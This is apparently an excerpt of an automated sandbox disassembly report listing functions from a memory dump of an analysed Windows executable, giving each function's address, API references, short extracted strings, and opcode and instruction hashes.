Instruction Fuzzy Hash: 0461AC7560C301EFE710CF24EC41B6AB7E4EB86714F10883EFA98972A1D7759946CB4A

Function 0042DDAB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 0042DF8F

Strings

HQ_X, xrefs: 0042DE03
DID@, xrefs: 0042DE19
HNZC, xrefs: 0042DE24

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FreeLibrary
String ID: DID@$HNZC$HQ_X
API String ID: 3664257935-404043411
Opcode ID: 7685dc6bd5cd68a62efe9329fc9df86e9ec86845cd580441f8bd7c73ab6287e6
Instruction ID: 7ed807d424f99c8a286e03362966888a07fba4078fc00c6b3b8880a6c426774b
Opcode Fuzzy Hash: 7685dc6bd5cd68a62efe9329fc9df86e9ec86845cd580441f8bd7c73ab6287e6
Instruction Fuzzy Hash: 37312874A0C3D19BE3228B159C917ABBBD1AFD3301F28446DE0CA2F392C6794406CB5B

Function 00427BEA Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 480COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00427C1D

Strings

rYaT, xrefs: 00427E95
ji46, xrefs: 00427E70

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: ji46$rYaT
API String ID: 237503144-3893754386
Opcode ID: 8b5f002b420495196e9941074b4af04b49aa4fcbde96667b868d6586055e1868
Instruction ID: 1d6d3fc58e1cdd2f9a1d0a9f5f5f22e201e877a9cbb0bada89082f4a02661aba
Opcode Fuzzy Hash: 8b5f002b420495196e9941074b4af04b49aa4fcbde96667b868d6586055e1868
Instruction Fuzzy Hash: 1E024675A08351CFE3248F28EC9072AB7E1FF8A314F0A46BDE59497291DB349D05CB86

Function 00417A7E Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 366COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417DBF

Strings

`, xrefs: 00417C5C

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: `
API String ID: 237503144-1519715813
Opcode ID: 1d69b5dbc75e1bfb0dcbc564ada1b76f693b927ee19b0a92887601fa87a9bf2d
Instruction ID: a97f7a09b8575a437b6776ba3c157882609dfd03de6747e90ce883758ad12047
Opcode Fuzzy Hash: 1d69b5dbc75e1bfb0dcbc564ada1b76f693b927ee19b0a92887601fa87a9bf2d
Instruction Fuzzy Hash: 89B13A769083218BC324CF24C8916BBB7F1EFD9764F194A2EE4C95B3A0E7748941C786

Function 00428C9B Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00428CCB

Strings

L, xrefs: 00428D19
qr, xrefs: 00428E94

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: L$qr
API String ID: 237503144-2663492237
Opcode ID: 49150ecf17537569e908602358794222df8f7b1197654b586d29c9d780babd9f
Instruction ID: c7c55dca0bf1ec95fe2b056518e6cbfbd9b03799127961dcc329ddf1f1933f38
Opcode Fuzzy Hash: 49150ecf17537569e908602358794222df8f7b1197654b586d29c9d780babd9f
Instruction Fuzzy Hash: 71610672B5C3258BD718CF39984129FF6E6ABC5314F05893DE485DB281DB78C90A8B86

Function 004090D0 Relevance: 5.5, Strings: 4, Instructions: 464COMMON

Download Yara Rule

Strings

]_[, xrefs: 00409128
YT, xrefs: 00409130
h, xrefs: 00409226
(,.., xrefs: 00409470

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: h$(,..$YT$]_[
API String ID: 0-739460008
Opcode ID: 2c3247610f00ee4376cf5dda08f0336ad92fca5439f1b4266d765d1f2b4ee5ef
Instruction ID: fbc816b77af6502dc3722b079d5cd8fbe4fcf3a52f06b00b1743bac28d25b694
Opcode Fuzzy Hash: 2c3247610f00ee4376cf5dda08f0336ad92fca5439f1b4266d765d1f2b4ee5ef
Instruction Fuzzy Hash: C7D12B7150C3914AC722CF79885026BFFE1AF97204F4889AED8D5AB383C279D906C796

Function 004169C0 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

f, xrefs: 00416B81
0, xrefs: 00416CF0
bvlM, xrefs: 00416C31
L&#1, xrefs: 00416C63

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID: 0$L&#1$bvlM$f
API String ID: 2994545307-736594754
Opcode ID: 2b4679ebc505e7d27852cd5f28dab34ea2842cdfda95b40bfe82a627e77e670f
Instruction ID: 5cc7e6cacd9f591d95a0c13e4d86516a51b647e6ac8c114382c721e1f4d1b9b6
Opcode Fuzzy Hash: 2b4679ebc505e7d27852cd5f28dab34ea2842cdfda95b40bfe82a627e77e670f
Instruction Fuzzy Hash: 4F911C716083918FD324CF24C8517ABBBE1EB97300F29896ED4D5C7252D639C985CB9A

Function 0040CEDB Relevance: 5.2, Strings: 4, Instructions: 150COMMON

Download Yara Rule

Strings

Cu, xrefs: 0040CFAD
s|, xrefs: 0040CFA2
D, xrefs: 0040D126
64, xrefs: 0040CEE3

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: Cu$D$s|$64
API String ID: 0-114610215
Opcode ID: 01490c322100d9b7c3b806a79fd0647646783b0c950b28c2872a051548989443
Instruction ID: a6b5fbefc84d7a632b6de2f414d5f30cd5c991f5bd21e007442d1bea69d7bd8b
Opcode Fuzzy Hash: 01490c322100d9b7c3b806a79fd0647646783b0c950b28c2872a051548989443
Instruction Fuzzy Hash: 4B5133B05483818FE3208F55C8A576BBBF1FB81748F10591CE6D65B3A0D3BA854ACF86

Function 00427190 Relevance: 4.3, Strings: 3, Instructions: 515COMMON

Download Yara Rule

Strings

#OHI, xrefs: 004271CC
7[%E, xrefs: 004271AE
4tB, xrefs: 0042741D

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: #OHI$4tB$7[%E
API String ID: 0-506438138
Opcode ID: 38f14013febc7e743b5f87fccc87556549bbb9251e63bd7b275b96451770c4f6
Instruction ID: ee96b9713994d2d601df2ffc51cc732191283207dcf0d1d5f2ee743d6ff2f850
Opcode Fuzzy Hash: 38f14013febc7e743b5f87fccc87556549bbb9251e63bd7b275b96451770c4f6
Instruction Fuzzy Hash: 2A025AB1E082658FCB14CF68D8413AEBBB1EF4A304F1580A9D545BB346D738AD46CB99

Function 004260DD Relevance: 4.1, Strings: 3, Instructions: 386COMMON

Download Yara Rule

Strings

q^jd, xrefs: 00426BCC
dlB, xrefs: 00426C5E
,w|y, xrefs: 00426BD4

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: ,w|y$dlB$q^jd
API String ID: 0-1494296930
Opcode ID: 27d87feb3751a718207444974a2fb5cf4cca6e6a036e9ff850eff3f16ede8312
Instruction ID: bf95f5fa37f9375b02c2ec495c70b665b9d1f1399691d10326b7b221676bb7fa
Opcode Fuzzy Hash: 27d87feb3751a718207444974a2fb5cf4cca6e6a036e9ff850eff3f16ede8312
Instruction Fuzzy Hash: 9DC14B32B083648BCB24CE6494412AB7BA2DF96300F59C52EE9C5CB345D63DD946D78A

Function 00429CF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429DC9

Strings

]>h<, xrefs: 00429D3A

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: ]>h<
API String ID: 237503144-3030212049
Opcode ID: e9037479c24fdfde963404b65f45ebe6ff4ee913b880207234c185a1e40cea53
Instruction ID: 078f40d5ba68390e6ca3eff5d9c37930aaf4ec8c603ba1d3c0406bbba0adf978
Opcode Fuzzy Hash: e9037479c24fdfde963404b65f45ebe6ff4ee913b880207234c185a1e40cea53
Instruction Fuzzy Hash: 7041DFB114C350CFE304CF65A89166BBBA5FBC6358F10097CE5899B252C7B9D906CB4A

Function 0041C5C0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

a{, xrefs: 0041C885
~y, xrefs: 0041C89D

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: a{$~y
API String ID: 0-3182041098
Opcode ID: 3d454d49985a2a0e3b941ede6320639c585380cceb87bdbe4e8007742991eaa4
Instruction ID: 75bff3c3db158d954bec842596e0cdcced5b236e80de3a33e7ec932c4dc99f6f
Opcode Fuzzy Hash: 3d454d49985a2a0e3b941ede6320639c585380cceb87bdbe4e8007742991eaa4
Instruction Fuzzy Hash: 84B124759483108BC724DF28C89167BB7F1FF86320F18965DE9D69B390E7389845CB8A

Function 00415DC6 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

gfff, xrefs: 00415F5C
7, xrefs: 00415ED9

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: d341d885781e2600fc0aa9abe4b3c0818b932f2a5183de542d9fe97bd23cc889
Instruction ID: 01b21243a20702138b51205bd9c623b69e34be6f8268a7d997fa6d0268599045
Opcode Fuzzy Hash: d341d885781e2600fc0aa9abe4b3c0818b932f2a5183de542d9fe97bd23cc889
Instruction Fuzzy Hash: 59613772A147008FD714CB29CC11BAB77E2ABC5324F59C63EE499C7391DB38C8468B86

Function 0041CA31 Relevance: 2.7, Strings: 2, Instructions: 195COMMON

Download Yara Rule

Strings

_8Y, xrefs: 0041CAD5
[U, xrefs: 0041CADD

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: b0d1fc465a6e0976bbd15fa914788d61173f673717a0b10e5c89f8b790ea59dc
Instruction ID: 9c64b4bc5be12fe9f75fb68bc15c68ddc9596453a12a6dbfc66edc477172d374
Opcode Fuzzy Hash: b0d1fc465a6e0976bbd15fa914788d61173f673717a0b10e5c89f8b790ea59dc
Instruction Fuzzy Hash: 8051FEB164C3508BD7109F28D86276BB7F1EF92718F14496DE8C99B281E33AD942C74A

Function 0041CA48 Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

_8Y, xrefs: 0041CAD5
[U, xrefs: 0041CADD

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: 50cbfdcee0948dcbdd23f1ae7ac5e781ce55625ed94e819955dcea971a560f28
Instruction ID: 28b5ea908cd200a1f324e1be12f6cae0da75ca6590cd75e649b7e21bd8b1c8c4
Opcode Fuzzy Hash: 50cbfdcee0948dcbdd23f1ae7ac5e781ce55625ed94e819955dcea971a560f28
Instruction Fuzzy Hash: 465111B064C3508BD3109F28D85276BB7F1EF92718F14496DE8C99B281E339D942C74A

Function 00429BB6 Relevance: 2.6, Strings: 2, Instructions: 63COMMON

Download Yara Rule

Strings

#"! , xrefs: 00429843
#"! , xrefs: 00429C06

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: #"! $#"!
API String ID: 0-2193544780
Opcode ID: abed44959698438cb1c661172d06b6868037aba038c331fdbad8c604c70049aa
Instruction ID: cd4cf4d5666f8a53dd6c01a615deffee35ebb6a9d5f7e47654a0f796f435bd57
Opcode Fuzzy Hash: abed44959698438cb1c661172d06b6868037aba038c331fdbad8c604c70049aa
Instruction Fuzzy Hash: 8B118135B582608BD7188F58E89037BB3A1EFD6300F59987EC98977601C6799C06CB8E

Function 0041409E Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

RFA, xrefs: 0041463E

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: RFA
API String ID: 0-931248713
Opcode ID: c52c83a2dc7e44599d02b6d3fc1153327ac0e9e26eb41dda59cd18a9cf462278
Instruction ID: d964ecd79129a3e84731010d0bb4c1e5ef2bfb91af8b8152687b304041cbad3a
Opcode Fuzzy Hash: c52c83a2dc7e44599d02b6d3fc1153327ac0e9e26eb41dda59cd18a9cf462278
Instruction Fuzzy Hash: 99F104B9A00214EBDB148F94EC41BBF77B1EF8A310F15403AEA41A7392C7799C51CB99

Function 00421B90 Relevance: 1.7, Strings: 1, Instructions: 491COMMON

Download Yara Rule

Strings

XY, xrefs: 00421BBC

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: XY
API String ID: 0-554446067
Opcode ID: 588d111f525275397feefefa3b33aea84f7d203ba11118f70a6140ad978282fb
Instruction ID: d0a4d8830811aebd93eafad7b07ac1cf8a369ea5002ebfc377116dbfc8cce13c
Opcode Fuzzy Hash: 588d111f525275397feefefa3b33aea84f7d203ba11118f70a6140ad978282fb
Instruction Fuzzy Hash: 24C188757043205BD7149B25AC92A7BB3E1EFE1324F49843EE89587392E37CD806C35A

Function 0042AED0 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

", xrefs: 0042B1CA

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 9c5fcf4882b56b762d66e4d232856149ba000610ed3149ece24e5d6c45238d64
Instruction ID: 5d9ed2f4b436a587e8e56cab90cdcb535a8b60cbed088ade6d48d1a0fcd2b2e8
Opcode Fuzzy Hash: 9c5fcf4882b56b762d66e4d232856149ba000610ed3149ece24e5d6c45238d64
Instruction Fuzzy Hash: 0AD10271B083219FC714CE25A88072BB7E6EB84354F58C96EE89987381E738DC05C7DA

Function 0042546B Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

ol, xrefs: 004255E3

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: ol
API String ID: 0-3887614180
Opcode ID: 970f4193b524a2bd122eea626d0cf188bf19dcd07cbc74f263952f0bdaeb968c
Instruction ID: 7aa9c3509c59484caa343586baaaf50edff0654ad2b42a836a170c3a5c19e74a
Opcode Fuzzy Hash: 970f4193b524a2bd122eea626d0cf188bf19dcd07cbc74f263952f0bdaeb968c
Instruction Fuzzy Hash: 1EC1343160C7128BC324DF28D4916AFB3E2EFD5350F98892DE0C687360E7399946DB59

Function 0040AAA0 Relevance: 1.6, Strings: 1, Instructions: 375COMMON

Download Yara Rule

Strings

G, xrefs: 0040AE97

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 70dc6fffec8001c489d5f64c8bcfb6d1fe1721603c762928a24debc60d885bf5
Instruction ID: f48626985c55fc1fef1f40c4d0008b84fd224a6b25b3f7b9d47bbef1cefa0f56
Opcode Fuzzy Hash: 70dc6fffec8001c489d5f64c8bcfb6d1fe1721603c762928a24debc60d885bf5
Instruction Fuzzy Hash: 44C1177164C3914BD728CE6884912AFFBE2DBC1314F18893EE5E55B3C1D6798806C78B

Function 0042DA08 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

{Ftw, xrefs: 0042DB0D

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: {Ftw
API String ID: 0-1818186142
Opcode ID: dd9fde14b8f54b0dd6a43ef3875e77c449cdeca989125b396de5973d5cfe6629
Instruction ID: 6680c69c0eeb293711a0d3d3ea003c7c29a66e80494f312b60897737a0c123eb
Opcode Fuzzy Hash: dd9fde14b8f54b0dd6a43ef3875e77c449cdeca989125b396de5973d5cfe6629
Instruction Fuzzy Hash: 2C513970A0C3A24BE71DCF3A947077BBFD19B97304F68496DE0D297382D6288509C79A

Function 0042D2BA Relevance: 1.5, Strings: 1, Instructions: 229COMMON

Download Yara Rule

Strings

{Ftw, xrefs: 0042DB0D

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: {Ftw
API String ID: 0-1818186142
Opcode ID: 0bad9244c838ad41c448172ebadc09af827445c4a3a9c5fa16341be90e94a565
Instruction ID: 48203b4cab5f4c61946f97c35fd6d117fdadac71da7f4ae34be9f5cdc948ff22
Opcode Fuzzy Hash: 0bad9244c838ad41c448172ebadc09af827445c4a3a9c5fa16341be90e94a565
Instruction Fuzzy Hash: FB510670A0C3A14BD719CF2A947077BBFD19F97304F58499DE0D25B382D6688909C79B

Function 0042BB6C Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

GI^W, xrefs: 0042BB89

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: GI^W
API String ID: 0-2314976602
Opcode ID: 078e8d5ed1ee9c7da16ea7182450f96849eb6ceb227317bacbd7a954e21526a9
Instruction ID: 49333ae492997b835cdfef2578e7c3a39a981830b4f0cd6284df5a7707cecfee
Opcode Fuzzy Hash: 078e8d5ed1ee9c7da16ea7182450f96849eb6ceb227317bacbd7a954e21526a9
Instruction Fuzzy Hash: 0D416BA460C3E15BE7368B26A4707B77FD0EFA3306F28189DE4DA5B342DB3445058795

Function 00428FD0 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

gd, xrefs: 0042909C

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: gd
API String ID: 0-565856990
Opcode ID: 8047f239ee13dd6487501b28a969fae2f62aed1d507e02169b9812561186ede9
Instruction ID: af4b26260d56ce4a64166c070a8230139eae40b18e7b66fef885e27dcf52e14f
Opcode Fuzzy Hash: 8047f239ee13dd6487501b28a969fae2f62aed1d507e02169b9812561186ede9
Instruction Fuzzy Hash: 7941F1B09083298BD724DF18E85276BB3F0FF91304F048A1DF9858B291F7789A04C78A

Function 00416DA0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

, xrefs: 00416E85

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7787771548d8a45158bc5e694f080c7a7105c2e4e2551863cc337677b313aa5a
Instruction ID: b827fdf179c660f5feb19dad228a2c4949a63098f5defd2e83e1a35ea0f53e93
Opcode Fuzzy Hash: 7787771548d8a45158bc5e694f080c7a7105c2e4e2551863cc337677b313aa5a
Instruction Fuzzy Hash: 8E31E63810C3818BE7019F2994507BAFBE1ABDB319F190A6EE0C597293CB38C54AC756

Function 00414230 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

FCA, xrefs: 00414340, 004143FA

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID: FCA
API String ID: 2994545307-1373193632
Opcode ID: 9aed36c57e847628db72b037e193d756c5f3854209950122a05c03c8261fdea9
Instruction ID: da1c0db9761351975293612de948a7318495de0c6c16e9aad410fb0addf788bd
Opcode Fuzzy Hash: 9aed36c57e847628db72b037e193d756c5f3854209950122a05c03c8261fdea9
Instruction Fuzzy Hash: A831A779A412249BCB148F84E880AFFB3B1FF9A310F29113ED59667751C3399C528B9D

Function 0041AD3D Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

0, xrefs: 0041B086

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8565e1f0c62572a704c669222c54f745b2c78fcf8f9a20e684a60a65c7092e03
Instruction ID: fdca04bf25663439895bf8c196f2c14b852a70202da4179485de109e359b5960
Opcode Fuzzy Hash: 8565e1f0c62572a704c669222c54f745b2c78fcf8f9a20e684a60a65c7092e03
Instruction Fuzzy Hash: 37316D319096A086D7298A2850543FBFBE2DF97311F5894AFE8D15B382D7388946839A

Function 0043E6DB Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

.qg, xrefs: 0043E7CD

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: .qg
API String ID: 0-677383860
Opcode ID: d0fcf37da2aaffefbc289762087ce4023645970da64a562eb37ecee7b3ac715b
Instruction ID: 2478107b85bec5ea04d97e0001281ffabd2b778338291effa5682094572616fe
Opcode Fuzzy Hash: d0fcf37da2aaffefbc289762087ce4023645970da64a562eb37ecee7b3ac715b
Instruction Fuzzy Hash: 6B2122267956014FE3498E6999D22EA77D3D7D6220F08EA3D82D4C3392E12CC80BA705

Function 004289B1 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

MVBY, xrefs: 00428A75

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: MVBY
API String ID: 0-4042508585
Opcode ID: 7755342021dc1e50964d88f504e0e8fbd2111fe185f7baf32a402f5a3ba0da03
Instruction ID: f1107e564cab7bf1d5c90ec0f6b3d94c7bfe2434a4045452f86534282f76f3f2
Opcode Fuzzy Hash: 7755342021dc1e50964d88f504e0e8fbd2111fe185f7baf32a402f5a3ba0da03
